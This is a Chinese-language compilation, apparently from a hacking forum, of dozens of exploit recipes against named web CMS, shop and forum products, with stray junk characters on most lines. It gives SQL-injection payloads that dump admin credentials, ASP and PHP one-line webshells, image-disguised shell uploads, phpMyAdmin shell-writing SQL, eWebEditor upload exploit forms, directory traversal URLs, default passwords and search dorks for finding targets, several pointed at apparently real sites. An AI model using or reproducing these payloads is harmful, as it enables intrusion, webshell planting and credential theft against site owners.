启航企业建站系统 cookie注入漏洞通杀所有版本
4 d) M3 T6 G# n; B6 [6 Z3 u7 e Y0 ]0 j( p$ I
直接上exploit:7 J( P/ D$ y3 z L' x! D, S' z
javascript:alert(document.cookie="id="+escape("1 and 1=2 union select 1,username,password,4,5,6,7,8,9,10 from admin"));
$ M: T o( q" B& Qtest:http://www.tb11.net/system/xitong/shownews.asp?id=210
d+ s# |, Q H& x/ p--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
9 w9 ^! r) W! |/ q9 rAsprain论坛 注册用户 上传图片就可拿到webshell1 ]4 S$ A0 I" w. ^6 @; w3 ?: u: t
; m+ x7 c2 x4 s5 [Asprain是一个适合于各中小学、中专、技校、职高建设校园论坛、师生交流论坛,一些教科研部门、公司企业建设内部论坛、IT技术爱好者建设技术交流论坛的免费论坛程序。
- Q* O4 {6 ?2 f. @$ @: I1.txt存放你的一句话马 如:<%execute(request("cmd"))%>! C% q7 c( p0 Q4 h. b5 q( j
2.gif 为一小图片文件,一定要小,比如qq表情图片4 D, ]# y: Z N; a
3:copy /b 2.gif+1.txt 3.gif 这样就伪造了文件头,但是现在传上去还不行,我接下来就用
! w1 W+ T2 Q9 d0 u5 a% t/ o5 C6 q4:copy /b 3.gif+2.gif 4.asp ok,现在文件头和文件尾都是正常的图片文件了2 Z1 D9 J% P# }( j. \
5.q.asp;.gif
9 S) X) C( q% ~google:Powered by Asprain
7 ^+ q, z& E+ A( u- n/ G9 F( l--------------------------------------------------------------------------------------------------------------------------------------------------------------------------/ l/ f1 a" N# p% W+ k$ o' ]
( h a; b: ]1 ]7 DShopNum1全部系统存在上传漏洞。: F5 U `* v0 x
4 }% W& y. n' D7 D
首先 在 http://www.shopnum1.com/product.html 页面查看任意产品详细说明。
' j' G* N. g0 F2 C按说明 提示登录后台。。
9 L$ n/ t+ O; ~. j0 A5 k在后台功能页面->附件管理->附件列表
" e% L1 e3 a3 x4 n+ V& |- x5 n可以直接上传.aspx 后缀木马
' X8 H, x9 C0 J$ I; i5 {# y7 ~http://demo.shopnum1.com/upload/20110720083822500.aspx- o; `$ ?4 \) C, }# k/ f
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
& {" e3 F0 G' X( x$ H7 Z, v- U) N6 T# C* D# a8 c
牛牛CMS中小企业网站管理系统 上传漏洞
$ q8 U+ T3 o# A$ \
5 ?# s9 U: o) W5 J牛牛CMS是中企商铺网专为中小企业网站开发的网站管理系统。
% G4 V4 `. j/ k, d3 ], d4 l后台:admin/login.asp
' K8 i1 {' i3 S9 gewebeditor 5.5 Nday
1 j6 e6 u: l3 [- X# S0 D* P3 I4 uexp:
?4 R( D; G1 O7 d<form?action="http://www.lz5188.net/Admin/WebEditor168/asp/upload.asp?action=save&type=image&style=popup&cusdir=Mr.DzY.asp"?method=post?name=myform?enctype="multipart/form-data">?
2 H& ^5 e# F& z' G/ ?. w% S<input?type=file?name=uploadfile?size=100><br><br>?
! N1 ]' ^' L: Y: }3 }9 V! p<input?type=submit?value=upload>?
9 E V9 j8 h. A# U( M/ I- u' f</form>
# E; q# _8 ?, w9 j6 O7 Wps:先上传小马.0 W, A; G& h, X
inurl:member/Register.asp 您好,欢迎来到立即注册立即登录设为首页加入收藏: f V* D' {0 G/ o: T
( `2 u5 ], ]) P1 r
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------/ Y0 ^8 r0 o& r; T5 G
$ w' j' v% m, I: R4 b$ x2 vYothCMS 遍历目录漏洞
% w, A" W6 ?- Y* ~, Z( w2 D0 a/ D. b8 ?7 m# ?
优斯科技企业网站管理系统(YothCMS)是一款完全开源免费的CMS。
0 X' g' P8 e. N( |默认后台:admin/login.asp
7 |$ ?+ g5 ]: E- n& o; g# \遍历目录:$ P2 z! l6 J/ w1 d4 H9 S. j" T
ewebeditor/manage/upload.asp?id=1&dir=../" S" \( U, J. |9 }
data:
- i+ J- k5 j" o f% S6 b, N: ?http://www.flycn.net/%23da%23ta%23\%23db_%23data%23%23.asa
* l- n( i; q3 Y2 U+ P% U' Z--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
8 h* c# i4 M/ P( H1 D
( r. e$ h% |' z; D' i$ FNet112企业建站系统 1.0
' I* E c4 H0 M- A2 E
3 \ v2 u- p' |- Q( \7 h源码简介:9 R1 g* w; }% K( b- ?4 v
Net112企业建站系统,共有:新闻模块,产品模块,案例模块,下载模块,相册模块,招聘模块,自定义模块,友情链接模块 八大模块。
# \. A" U( L6 b+ _/ Q7 N+ U添加管理员:7 R- a6 U: K8 N4 t3 b9 f) f
http://www.0855.tv/admin/admin.asp?action=add&level=2' O1 y+ v9 P- r- M6 w* R0 Z
其实加不加都不是很重要,后台文件都没怎么作验证。' L' ?. v7 V2 g" K
上传路径:
' @; `& G. X4 N. `http://www.0855.tv/inc/Upfile.as ... 0&ImgHeight=2000 R6 y/ J7 ?9 {2 _/ S
http://www.0855.tv/inc/Upfile.asp?Stype=2
6 L- @) h( ?& t) G7 Q* m怎么利用自己研究。
`5 F6 n' ~' n/ i! c' W/ j遍历目录:; l Z( b; P$ f! z6 C
http://www.0855.tv/admin/upfile.asp?path=../..6 R1 d2 w3 C. @4 Y3 V
如:
. I, f! m- A- A7 mhttp://www.0855.tv/admin/upfile.asp?path=../admin2 p; ^4 S9 o4 J2 B& \5 w" Q
http://www.0855.tv/admin/upfile.asp?path=../data/ t) n+ E2 E- |
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
, @2 c0 D. ?* S9 u7 [' K3 F
- V' f4 T& o2 K易和阳光购物商城通杀 上传漏洞
9 D7 Y/ \; [9 m
, ^) e* r9 _# ^6 _; K3 h0 v# G前提要求是IIS6.0+asp坏境。0 _. o# }3 N- c! j0 n4 b
漏洞文件Iheeo_upfile.asp
( o1 ?+ Q! u/ Q4 v- s2 Z+ n! |$ w过滤不严.直接可以iis6.0上传
8 n$ f* p) @+ N7 E$ f7 v V- k把ASP木马改成0855.asp;1.gif0 C) t! b& |4 n$ V+ v6 ?' v
直接放到明小子上传
8 O4 U8 ?' P2 ?4 `4 J4 EGoogle搜索:inurl:product.asp?Iheeoid=6 d% C3 k8 \. W1 l( w, |$ b
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
1 T) P/ a7 b7 ~
! q- \# |. A% H2 c' N+ Vphpmyadmin后台4种拿shell方法
/ z& w$ {) l; D+ ~' ^! _! G7 s& W# f$ K% Q$ w) D
方法一:
" s g) n8 L8 Q2 a# X0 `CREATE TABLE `mysql`.`xiaoma` (`xiaoma1` TEXT NOT NULL );
& T: o, J: ~3 O" D$ z/ RINSERT INTO `mysql`.`xiaoma` (`xiaoma1` )VALUES ('<?php @eval($_POST[xiaoma])?>');
) b1 J! G. I, e' _SELECT xiaomaFROM study INTO OUTFILE 'E:/wamp/www/7.php';
, \. s$ H3 d' C' a# G* v& n3 g----以上同时执行,在数据库: mysql 下创建一个表名为:xiaoma,字段为xiaoma1,导出到E:/wamp/www/7.php
! Q1 B9 g" c; B# u4 H4 {4 }5 {/ g( ^一句话连接密码:xiaoma2 o9 E! B" s+ s' i* n8 G
方法二:1 f2 s2 [7 z* S2 p
Create TABLE xiaoma (xiaoma1 text NOT NULL);5 ?4 s1 K& q M* I1 `% ^. M' |0 T
Insert INTO xiaoma (xiaoma1) VALUES('<?php eval($_POST[xiaoma])?>');
! Y3 W e/ j% u+ ~select xiaoma1 from xiaoma into outfile 'E:/wamp/www/7.php';2 ]& T0 e; j$ B4 Z# Q% c- {# e
Drop TABLE IF EXISTS xiaoma;/ [) k$ r7 J3 j- J* ~7 _
方法三:, y, s& S+ e8 C' b% a9 J
读取文件内容: select load_file('E:/xamp/www/s.php');
$ x1 r* E0 d; A# W写一句话:select '<?php @eval($_POST[cmd])?>'INTO OUTFILE 'E:/xamp/www/xiaoma.php'1 U# n' t8 ^2 z2 j: s
cmd执行权限:select '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'E:/xamp/www/xiaoma.php'
8 B6 e, A* L; q' C( V方法四:
* h: s; K" P+ j, v& B9 yselect load_file('E:/xamp/www/xiaoma.php');
S ?+ c5 U6 tselect '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'E:/xamp/www/xiaoma.php'
1 J/ L6 Z- J5 g, J' @% s: @然后访问网站目录:http://www.xxxx.com/xiaoma.php?cmd=dir
9 k) o0 z, @" v; B2 G Q--------------------------------------------------------------------------------------------------------------------------------------------------------------------------' z: t" P3 d8 g0 B
J4 W5 f4 u* n4 ]传信网络独立开发网站源码0day漏洞
( D7 Q( P) P2 ~4 ^- Y# |2 k& B
1 V( T! D' A+ \+ q3 A- Q后台system/login.asp
$ s3 [" e' e0 t0 ^3 x1 R进了后台有个ewebeditor
( Y! o$ M m+ i1 B T. X f# y0 dGoogle 搜索inurl:product1.asp?tyc=
9 c2 a& m' `5 d$ D编辑器漏洞默认后台ubbcode/admin_login.asp, W4 A+ y, K7 S! S8 d
数据库ubbcode/db/ewebeditor.mdb, U3 Z+ z3 K T; a' ^
默认账号密码yzm 1111115 y* L1 O" D% M+ U; y/ N* V0 F) W
& G- f9 j$ r$ ^/ O |6 v; Y
拿webshell方法* ] f3 |( k* I
登陆后台点击“样式管理”-选择新增样式
* ~1 I9 z# z/ h! [; p9 ?+ ]样式名称:scriptkiddies 随便写 & ^7 x6 K: w7 r3 c4 @
路径模式:选择绝对路径
, p4 ^" C E, D# |( h, {; {2 B图片类型:gif|jpg|jpeg|bmpasp|asa|aaspsp|cer|cdx8 p% J" t9 h2 m3 h! X5 k& ^
图片类型比如就是我们要上传的ASP木马格式& \& Q3 v6 z$ T( q- U
上传路径:/. u) N- }" }: |+ {: f& e
图片限制:写上1000 免的上不了我们的asp木马1 ^& a8 y0 c, z- e0 v
上传内容不要写
5 t1 E1 {1 m' a9 ?可以提交了 1 U* j2 j0 G t
样式增加成功!
0 d, Y3 a# I3 s+ W* M1 R3 ]9 }返回样式管理 找到刚才添加的样式名称 然后按工具栏 在按新增工具栏
& T0 l/ y* W4 Q4 z. P; _) C' G( i! c按钮设置 在可选按钮 选择插入图片然后按》 -然后保存设置6 A+ W: M; q/ C5 e2 l# V
网页地址栏直接输入ubbcode/Upload.asp?action=save&type=&style=scriptkiddies
! c% z8 p- l" v/ B, M6 _ ~, y2 {上ASP木马 回车 等到路径1 D+ K/ q2 ], m. a
3 E" P& D$ K, ?; o2 Y, P- K! ?) D后台:system/login.asp
7 y" v+ b7 n) q: v) o' D: a; bExp:
" \6 k( c- } T Q1 Gand 1=2 union select 1,userid,3,4,5,6,7,8,userpwd,10,11,12,13,14,15 from master
: ?4 d2 d0 f* i5 X; y测试:+ L' J( ]& k+ x! P
http://www.zjgaoneng.com/product_show.asp?id=9 and 1=2 union select 1,userid,3,4,5,6,7,8,userpwd,10,11,12,13,14,15 from master
\7 P) y. v4 I, }8 m- N, l* ~% ~ Ohttp://www.yaerli.com/product_show.asp?id=245 union select 1,userid,3,4,5,6,7,8,userpwd,10,11,12,13,14 from master
, W" m3 [' c) s8 D0 ?--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
0 V; Y) M1 [2 m1 W+ b2 _1 z
W. A7 \& c6 O* O0 @- dfoosun 0day 最新注入漏洞# B# n( R* }/ c* e, ^
3 r8 s8 \: s9 e5 O( J: K X7 a2 q
漏洞文件:www.xxx.com/user/SetNextOptions.asp6 G* R+ C4 Y, B& r# X. u
利用简单的方法:6 G1 c1 F5 q: O" }& M& p6 T# c
暴管理员帐号:8 M0 t5 V1 W) k6 |# y& t/ `7 J, _$ D
http://www.i0day.com/user/SetNex ... amp;ReqSql=select+1,admin_name,3,4,5,6,7,8++from+FS_MF_Admin
' T& m) W/ p7 H暴管理员密码:
% m$ M3 C+ z* u' mhttp://www.i0day.com/user/SetNex ... amp;ReqSql=select+1,admin_pass_word,
$ h& j2 [- q( p--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
4 h, f3 Y7 c& Q' x% n3 E3 k
& `; V$ l1 }) J) c5 t$ ~- y网站程序的版权未知!9 H4 a4 ~! T9 V+ a- ~4 f% I
7 F0 T- S }+ `. q1 Y默认网站数据库:
! ]) }- }, Y- Swww.i0day.com/data/nxnews.mdb
& X: ?8 p: B$ O, X% o; yewebeditor 在线编辑器:# E, V7 Y/ R" H/ C& ^, F0 } A
编辑器数据库下载地址:www.i0day.com/ewebeditor/db/ewebeditor.mdb9 F# n. \1 a0 a+ L# r3 L
登录地址:ewebeditor/admin_login.asp+ g" B. F" S) q- t
默认密码:admin admin
* B5 E/ Q' T% i' y登陆后可遍历目录:ewebedtior/admin_uploadfile.asp?id=22&dir=../../data
: s# \0 n. A9 t/ ?8 R) I; ~1 j& q' l O2 {! R2 O
Sql注入漏洞:& ^1 I" z A: q, I6 j" l
http://www.i0day.com/detail.asp?id=125 _1 O8 f6 r1 o& l% s# G. Y
exp:
8 ?; _" g) T. N6 X2 i8 ~; a7 aunion select 1,admin,password,4,5,6,7,8 from admin9 l) q. E+ r! {9 A5 f, k9 F# G
爆出明文帐号/密码9 c1 _) X! n+ ~3 F+ h) c
) i, [% `0 g# j4 r# j上传漏洞:! ?) r9 }- K5 q' X
后台+upfile.asp
6 G6 z: a% `8 c" k7 _5 j如:
. f% P/ i8 n0 @9 Y: b/ n' {' Yhttp://www.i0day.com/manage/upfile.asp 可以用工具。如明小子。
$ K9 Y" Y9 d0 a- o& V+ g$ Eshell的地址:网址+后台+成功上传的马
% E7 t3 ~6 f. t m6 d4 t3 S' o4 Z/ ggoogle:inurl:news.asp?lanmuName=, v! U& U$ a; s( M! R8 k. p: h
------------------------------------------------------------------------------------------------------------------------------------------------------------------------1 @- O6 V% i. m. j5 Q4 c
$ d1 ]4 h7 e, X7 f- M: Qdedecms最新0day利用不进后台直接拿WEBSHELL- ?( v1 p+ h$ u
: H! d) k' p1 S1 h7 a拿webshell的方法如下:
( c; G( F9 {& n- b网传的都是说要知道后台才能利用,但不用,只要 plus 目录存在,服务器能外连,就能拿shell.( B% K3 g- C6 z) l
前题条件,必须准备好自己的dede数据库,然后插入数据:
9 k; P" n# i; s# K" Kinsert into dede_mytag(aid,normbody) values(1,'{dede:php}$fp = @fopen("1.php", \'a\');@fwrite($fp, \'\');echo "OK";@fclose($fp);{/dede:php}'); 9 A0 P: \* w4 O; F& A* F
/ E; c) B9 Y, o1 V
再用下面表单提交,shell 就在同目录下 1.php。原理自己研究。。。" W4 j& Z9 f/ W5 }3 a* t
<form action="" method="post" name="QuickSearch" id="QuickSearch" onsubmit="addaction();">
* V7 p/ w8 [" o! ]<input type="text" value="http://www.tmdsb.com/plus/mytag_js.php?aid=1" name="doaction" style="width:400"><br />
( H+ ^6 y" A% Y) q5 G! B8 Q" l<input type="text" value="dbhost" name="_COOKIE[GLOBALS][cfg_dbhost]" style="width:400"><br />
; d" p. f5 E) J- b( S<input type="text" value="dbuser" name="_COOKIE[GLOBALS][cfg_dbuser]" style="width:400"><br />1 q# |7 P6 X# y4 b
<input type="text" value="dbpwd" name="_COOKIE[GLOBALS][cfg_dbpwd]" style="width:400"><br />
& V X+ F% v% y3 S# }<input type="text" value="dbname" name="_COOKIE[GLOBALS][cfg_dbname]" style="width:400"><br />
" u+ [5 h7 a) X. ? e<input type="text" value="dede_" name="_COOKIE[GLOBALS][cfg_dbprefix]" style="width:400"><br />! A4 v" m4 y% ?
<input type="text" value="true" name="nocache" style="width:400">" @/ k8 p1 z5 q/ N
<input type="submit" value="提交" name="QuickSearchBtn"><br />6 y9 B2 }; |! L/ z- `. v: c: z
</form>& [1 u' s: z7 H0 B0 `) Q
<script>
8 q/ R6 N8 S- b# V, A3 A2 P* nfunction addaction()) i' Z/ C; K3 s2 e- ?: }
{0 l5 b" Q3 D- j6 K$ _1 i
document.QuickSearch.action=document.QuickSearch.doaction.value;
! g: X L- g3 j$ |6 N}9 y; ] h, c& c- B* M
</script>
6 d0 V6 @1 @6 z-----------------------------------------------------------------------------------------------------------------------------------------------
9 L* C' [2 [, ~6 J
, I1 N ^: W( W. R6 H3 o6 i: Odedecms织梦暴最新严重0day漏洞( R9 C' d4 m: R) Z8 B" s
bug被利用步骤如下:3 a: m' w, ?2 }
http://www.2cto.com /网站后台/login.php?dopost=login&validate={dcug}&userid=admin&pwd=inimda&_POST[GLOBALS][cfg_dbhost]=116.255.183.90&_POST[GLOBALS][cfg_dbuser]=root&_POST[GLOBALS][cfg_dbpwd]=r0t0&_POST[GLOBALS][cfg_dbname]=root0 r+ N1 c2 ~: C' a% h2 o
把上面{}上的字母改为当前的验证码,即可直接进入网站后台。1 p! v( b6 w7 ^, Z3 K l
-------------------------------------------------------------------------------------------------------------------------------------------; O9 t/ f& r# n8 b `
$ j |2 e' v2 [% o8 z; X
多多淘宝客程序上传漏洞 * J$ C, v h7 C0 ^/ ~/ P1 K% l* Q
漏洞页面:
' o( x2 Q$ o" v5 W- h( \: q: K' dadmin\upload_pic.php- E. t8 }$ v" J# z& a( a/ ?+ _
传送门:
6 _0 Z- `+ D! o) E4 Ihttp://www.www.com/admin/upload_pic.php?uploadtext=slide1
9 \* N/ Q5 ~8 \PS:copy张图片马 直接 xxx.php 上传抓包地址!. o/ ^$ k* X) d0 {
------------------------------------------------------------------------------------------------------------------------------------------------------2 W" Y4 p# s8 Z" d
/ m M9 r) L; A$ n) B, H无忧公司系统ASP专业版后台上传漏洞0 Y/ ?) e8 I. F& f
漏洞文件 后台上传
7 Y! k) l* S9 u1 s9 q2 Badmin/uploadPic.asp
: v/ s( g2 D5 i漏洞利用 这个漏洞好像是雷池的
) |" l0 j$ ^3 m0 R ~0 ~% p1 {http://forum.huc08.com/admin/upl ... ptkiddies.asp;& upload_code=ok&editImageNum=1
" h0 z- t/ Y+ O等到的webshell路径:
7 I3 w' y' H8 m* r/UploadFiles/scriptkiddies.asp;_2.gif4 ]( p; B0 j( t6 C& q2 B
---------------------------------------------------------------------------------------------------------------------------------------------------
2 I/ |' I7 j4 \- x# a+ y' d ?9 Y; e2 a0 X4 d
住哪酒店分销联盟系统2010
* R2 I% @1 f' Z2 tSearch:
7 V$ T, ~5 U+ U& A6 Linurl:index.php?m=hotelinfo
% [; U- u( A& Hhttp://forum.huc08.com /index.php?m=liansuohotel&cityid=53%20and%201=2%20union%20select%201,concat(username,0x3a,password),3,4,5,6,7,8,9,10%20from%20zhuna_admin
: r% v0 P, x* z3 e8 s默认后台:index.php?m=admin/login
$ Z! p; @8 C0 U' Y8 Y* }" ~--------------------------------------------------------------------------------------------------------------------------------------------------
) d* m' E l k6 W3 D
& Z; e3 r) c) L9 tinurl:info_Print.asp?ArticleID=. D1 ]4 R. s3 r7 K* z
后台 ad_login.asp! [# H; ?6 c; k* {$ B" r
爆管理员密码:
+ c) M% F- ~7 F5 L2 ?4 Junion select 1,2,username,password,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28 from admin# ]; k; x5 F8 `; w
------------------------------------------------------------------------------------------------------------------------------------------------------------
1 |+ V" i* W8 p: \- Q+ j& P
1 p8 m' S( |8 i! W" U搜索框漏洞!
% `/ J3 X* m Z: e/ ] }%' and 1=2 union select 1,admin,3,4,5,6,password,8,9,10 from admin where '%'='! m7 L1 j P9 ]$ h' l; ?
-------------------------------------------------------------------------------------------------------------------------------------------------------- {7 V+ y: O- M c2 ?9 u1 O* h! \
' s2 }/ w4 f# U" g/ @! L' x
关键字:
! V7 q$ R6 _$ Y7 d% h- Z' J; Cinurl:/reg_TemletSel.asp?step=2
" X' X: M H. ^$ c$ d- t7 c或者' [% f7 V+ y. }& z1 G
电子商务自助建站--您理想的助手
# ^0 x! c/ d# F- h' d-------------------------------------------------------------------------------------------------------------------------------------------------0 |) J1 K; t6 a; U
; @5 I/ x$ ~2 r; x) t2 a8 F$ `iGiveTest 2.1.0注入漏洞3 g: a3 I3 _, p; Z U
Version: <= 2.1.0% N: X7 V5 |# S# J) L( L7 e: D
# Homepage: http://iGiveTest.com/* m2 N4 y* |( J" J, @
谷歌关键字: “Powered by iGiveTest”
# c1 b" c; A. {! f9 u随便注册一个帐号。然后暴管理员帐号和密码
9 U$ O; e* c7 O9 r5 Z! y8 A lhttp://www.xxxx.com/users.php?ac ... r=-1&userids=-1) union select 1,concat(user_name,0x3a,user_passhash),user_email,user_firstname,user_lastname,6,7 from users,groups where (1
; o8 ]& ~ a$ y/ _------------------------------------------------------------------------------------------------------------------------------------------------! N# L- U. W$ S! F+ `. N
1 U, i( }( F2 y/ L% X. g7 B: kCKXP网上书店注入漏洞. A8 G* ]- G; q; }; W' q
工具加表:shop_admin 加字段:admin% s5 U0 T+ z: i( S9 l
后台:admin/login.asp
+ k* u* }7 j0 w Z; ^( ^" z3 h登陆后访问:admin/editfile.asp?act= 直接写马.也可以直接传马:admin/upfile1.asp?path=/
5 l( T! a* m) I$ l: ^4 ?1 winurl:book.asp 请使用域名访问本站并不代表我们赞同或者支持读者的观点。我们的立场仅限于传播更多读者感兴趣的信息% B! o4 z4 _, }9 ^. F8 V: s
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
. E' x/ \; P. A$ U x; K. ]: A8 h5 s
段富超个人网站系统留言本写马漏洞- @. ]0 |4 ^4 H0 M( M( i. a
源码下载:http://www.mycodes.net/24/2149.htm
* _5 T9 C" d0 J3 O+ Y! g8 T0 haddgbook.asp 提交一句话。
0 u. n B% `: F. I& `连接: http://www.xxxx.tv/date/date3f.asp! X/ W4 Y/ o3 v* d
google:为防批量,特略!% p% L4 [6 S, i
-------------------------------------------------------------------------------------------------------------------------------------------------------------------------
" t3 k7 Y! j/ F: y( H, {/ d% M' }) i/ I) d
智有道专业旅游系统v1.0 注入及列目录漏洞 Q$ f" a3 J3 N# F
默认后台路径:/admin/login.asp) Z/ U9 o* \. G8 D- D
默认管理员:admin( B% z; N& ~% }, S3 \+ e) ]
默认密码:123456* R7 P. r$ `2 n4 a
SQL EXP Tset:
7 Y& q7 u; K: X* uhttp://www.untnt.com/info/show.asp?id=90 union select 1,userid,3,4,5,userpsw,7,8,9,10,11,12,13,14,15 from admin2 b/ N, n2 p: u: w u8 T
------------------------------------------------------------------------------------------------------------------------------------------------------------------------
/ F7 j1 k5 I, d! h; I" w! f1 L9 P6 B
ewebeditor(PHP) Ver 3.8 本任意文件上传0day, i ?. U; E- Y/ J
EXP:
) F! t6 Q. K/ N2 I+ c! ?0 E: A<title>eWebeditoR3.8 for php任意文件上EXP</title>
- Y' ?. A, x7 ] Y<form action="" method=post enctype="multip
% G l9 f4 D# [( Z' f( n: j) ~ uart/form-data">
* G8 y) c2 L1 t; I. u<INPUT TYPE="hidden" name="MAX_FILE_SIZE" value="512000">
$ f/ m5 U1 G3 U' N( X; I# e/ O* pURL:<input type=text name=url value="http://www.untnt.com/ewebeditor/" size=100><br> ( ]7 d$ C% H, Z3 A- W: B0 H' c
<INPUT TYPE="hidden" name="aStyle[12]" value="toby57|||gray|||red|||../uploadfile/|||550|||350|||php|||swf|||gif|jpg|jpeg|bmp|||rm|mp3|wav|mid|midi|ra|avi|mpg|mpeg|asf|asx|wma|mov|||gif|jpg|jpeg|bmp|||500|||100|||100|||100|||100|||1|||1|||EDIT|||1|||0|||0|||||||||1|||0|||Office|||1|||zh-cn|||0|||500|||300|||0|||...|||FF0000|||12|||宋体||||||0|||jpg|jpeg|||300|||FFFFFF|||1"> 0 s- z' q3 p3 D% X8 e
file:<input type=file name="uploadfile"><br> 3 s& J: r2 h; ?' K" }8 l- q' { [7 F
<input type=button value=submit onclick=fsubmit()> # z1 Q# f7 M9 p/ ]" x( E: r
</form><br> 2 q+ ^. T& R$ c4 p) M9 r) m
<script>
& `! Z" ?4 F- B% M" m: Xfunction fsubmit(){
) D+ J' m2 d. L; T: Fform = document.forms[0];
& L* W4 Z4 x9 W( o0 r; I8 D( q8 `form.action = form.url.value+''php/upload.php?action=save&type=FILE&style=toby57&language=en'';
* Y' o- T! y, A8 O; o+ T. Nalert(form.action);
$ P2 S- n6 g+ `; S) ]' O+ g uform.submit();
9 d4 x8 U% w i+ ^ p} # T* N) n' _2 F0 C1 {. ?
</script>
9 ?# f" ? R' e G注意修改里面ewebeditor的名称还有路径。3 B& ~, A: ~& l7 P( F5 K# w
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------- v+ j1 o+ d6 `
0 [1 N2 N$ _/ H! y. m& v. B提交’时提示ip被记录 防注入系统的利用
( i/ |/ i8 q' M( s网址:http://www.xxx.com/newslist.asp?id=122′( J P2 {7 e5 f& y+ s" B% l
提示“你的操作已被记录!”等信息。
% {; N6 t7 M( a; u# q9 |4 p利用方法:www.xxx.com/sqlin.asp看是否存在,存在提交http://www.xxx.com/newslist.asp?id=122‘excute(request("TNT"))写入一句话。
) q: ?$ [9 l/ B/ @-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------
- {, l1 s* z+ t9 T8 ~% ] j ^# E( S \ `
西部商务网站管理系统 批量拿shell-0day
7 R. y; p& R/ G8 H- q! T! U. U这站用的是SQL通用防注入程序 V3.0,恩,这东西可不好绕,我记得当初我有写过一个文章 通过提交一句话直接拿shell的..唯一的前提是存储记录ip的数据库必须是.asp或.asa才行..看了下sqlin.mdb
3 A' m5 N# } o- X: B1:admin_upset.asp 这个文件有个设置上传后缀的地方.. 很简单,它直接禁止了asp,asa.aspx 还有个cer可以利用嘛# M5 y6 e. I! x4 ]' X% ~4 a
2:同样是admin_upset.asp 这个文件不是入库的 他是直接在htmleditor目录生成个config.asp文件...Ok不用多说,插个一句话搞定...注意闭合
0 k: _* `! A* r3:admin_bakup.asp 备份数据库的..但是得本地构造...调用了filesystemobject 怎么利用就不强调了..IIS的bug大家都懂; d! a( a" \: j+ {
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------0 ?0 i: r2 T" D1 R' N$ @- `
8 ]( y4 {0 i7 E! m8 t
JspRun!6.0 论坛管理后台注入漏洞# S, i0 M$ _: E% N4 n* A4 [
: I% R( R6 }) h9 D: r
SEBUG-ID:20787 发布时间:2011-04-30 影响版本:- {8 u% X7 ~5 A$ ^; z
JspRun!6.0 4 O( T9 k3 o) _# ?
漏洞描述:9 ?8 n& o! b1 E/ H
JspRun!论坛管理后台的export变量没有过滤,直接进入查询语句,导致进行后台,可以操作数据库,获取系统权限。
9 b W+ Q$ q8 v( M* G% z在处理后台提交的文件中ForumManageAction.java第1940行7 ]& ]( v' i( W- V V. t0 O
String export = request.getParameter("export");//直接获取,没有安全过滤& B2 [6 }, l1 y& `$ f! j& U! `% c+ p
if(export!=null){
" _5 J3 m8 w' @' y8 dList> styles=dataBaseService.executeQuery("SELECT s.name, s.templateid, t.name AS tplname, t.directory, t.copyright FROM jrun_styles s LEFT JOIN jrun_templates t ON t.templateid=s.templateid WHERE styleid='"+export+"'");//进入查询语,执行了...
+ k9 Q) g/ J: @# {if(styles==null||styles.size()==0){9 r- ], l. r6 \: ^3 B- f
<*参考
, |+ c* ^/ F$ [, U2 v; Y. Tnuanfan@gmail.com. ~9 ?. Z+ {9 K) Q$ x8 X7 Z
*> SEBUG安全建议:
* j4 a. @6 m0 J$ C4 v- d; Awww.jsprun.net1 O: a8 H" A5 _" R) C4 n* w; R
(1)安全过滤变量export
0 [; Q' s0 }# D) R0 L& Y8 I2 ?! S(2)在查询语句中使用占位符7 U! f# N& R! f$ t' x6 p
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
' V8 b; W' e& \( ^; \1 o$ s, o3 V d/ s! |
乌邦图企业网站系统 cookies 注入
& A M2 t( H0 ?+ z( N5 B
. B P# r) W3 H- z程序完整登陆后台:/admin/login.asp
4 j% J1 T- L3 v4 x' A" t默认登陆帐号:admin 密码:admin888+ |7 Y7 O/ U1 } m* P c# j0 z0 `' G
语句:(前面加个空格)
; z& _) H! n$ U; d- u; G# Yand 1=2 union select 1,username,password,4,5,6,7,8,9,10 from admin4 O* z k. B. N( X" u& K
或者是16个字段:
6 ?& r/ F1 n- i) Mand 1=2 union select 1,username,password,4,5,6,7,8,9,10,11,12,13,14,15,16 from admin- R1 z% S7 S# |$ i
爆不出来自己猜字段。
, F. j1 o: L& Z- {注入点:http://www.untnt.com/shownews.asp?=885 [0 q/ M4 N# [. D- o: f. N
getshell:后台有备份,上传图片小马。备份名:a.asp 访问 xxx.com/databakup/a.asp
, `, B0 r2 y; y+ a关键字:# o2 z. G4 Q4 l
inurl:shownews?asp.id=
, \. W- j& e# G) U3 @7 r+ i* W-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------
4 D$ X! z: q4 O! M. a. `3 W5 X0 u% G/ k
CKXP网上书店注入漏洞
9 s: Y. A/ J8 o0 J
) D+ M5 q$ }% a工具加表:shop_admin 加字段:admin
/ o0 Q/ Y! `% d7 i3 @- a" K' v8 C后台:admin/login.asp ! C( E$ h! f6 D ]7 W5 D
登陆后访问:admin/editfile.asp?act= 直接写马.也可以直接传马:admin/upfile1.asp?path=/7 u/ S0 d6 n% G8 K3 Z. {. }9 z6 t
inurl:book.asp 请使用域名访问本站并不代表我们赞同或者支持读者的观点。我们的立场仅限于传播更多读者感兴趣的信息
, w9 a" h% L3 B2 i: N+ h; A4 `" H---------------------------------------------------------------------------------------------------------------------------------------------------------------------------: ^5 w: _9 |$ B% e
0 h- g$ y$ `- u2 G5 gYxShop易想购物商城4.7.1版本任意文件上传漏洞
" E9 I1 S* M- e9 k3 y" O' \5 i) D% i3 h) v2 s B, | W; R% }
http://xxoo.com/controls/fckedit ... aspx/connector.aspx; A& E7 G* G& {
跳转到网站根目录上传任意文件。* X! C& W3 T& `8 @- }# f
